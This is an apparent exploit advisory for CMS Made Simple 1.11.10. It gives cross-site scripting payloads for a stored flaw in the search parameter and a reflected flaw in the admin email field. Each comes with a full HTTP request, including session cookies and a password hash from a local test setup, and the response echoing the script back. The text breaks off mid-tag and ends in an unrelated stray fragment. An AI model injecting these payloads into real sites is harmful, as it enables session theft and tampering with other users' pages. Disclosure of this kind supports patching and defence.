Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerability Google dork : N/A Date : 02/04/2014 Exploit Author : Blessen Thomas Vendor Homepage : http://www.cmsmadesimple.org/ Software Link : N/A Version : 1.11.10 Tested on : Windows 7 hosted in WAMP server Type of Application :open source content management system, Stored XSS : Login to the admin portal and access search functionality http://localhost/cmsmadesimple-1.11.10-full/index.php Here the " search " parameter is vulnerable to stored xss. Payload : '">><marquee><img src=x onerror=confirm(1) request: POST http://localhost/cmsmadesimple-1.11.10-full/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/cmsmadesimple-1.11.10-full/index.php Cookie: _sx_=3ee623ee0900c03b; cms_admin_user_id=1; cms_passhash=fcb88b76587f0658cd2481a004312918; CMSSESSIDd508249c=qijlp266idmf9sjc51bai74lg7; PHPSESSID=5fvasiledip329l0bhr2ulb1j0; CMSSESSID7a29d042=qv3lpa3fpdflsmqac1icp5cfe7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 153 mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=15&cntnt01searchinput=%27%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29&submit=Submit response : <div id="search" class="core-float-right"> '">><marquee><img src=x onerror=confirm(1) </div> <a href="http://localhost/cmsmadesimple-1.11.10-full/" title="Home Page, shortcut key=1" >CMS Made Simple Site</a> </div> Reflected XSS : Login to the admin portal and click the "My Preferences" and click "My account" section. Here , the "email address" parameter is vulnerable to reflected XSS. Payload : "";</script><script>alert(0)</script><" request : POST http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299Cookie: _sx_=1c8c76366630b299; cms_admin_user_id=1; cms_passhash=fcb88b76587f0658cd2481a004312918; CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 103 active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";</script><script>alert(0)</script><"&submit_account=Submit response : </aside> </div> <!-- end sidebar //--> <!-- start main --> <div id="oe_mainarea" class="cf"> <aside class="message pageerrorcontainer" role="alert"><p>The email address entered is invalid: "";</script><script>alert(0)</script><"</p></aside><article role="main" class="content-inner"><header class="pageheader cf"><h1>My Account</h1><script type="text/javascript">
体验盒子
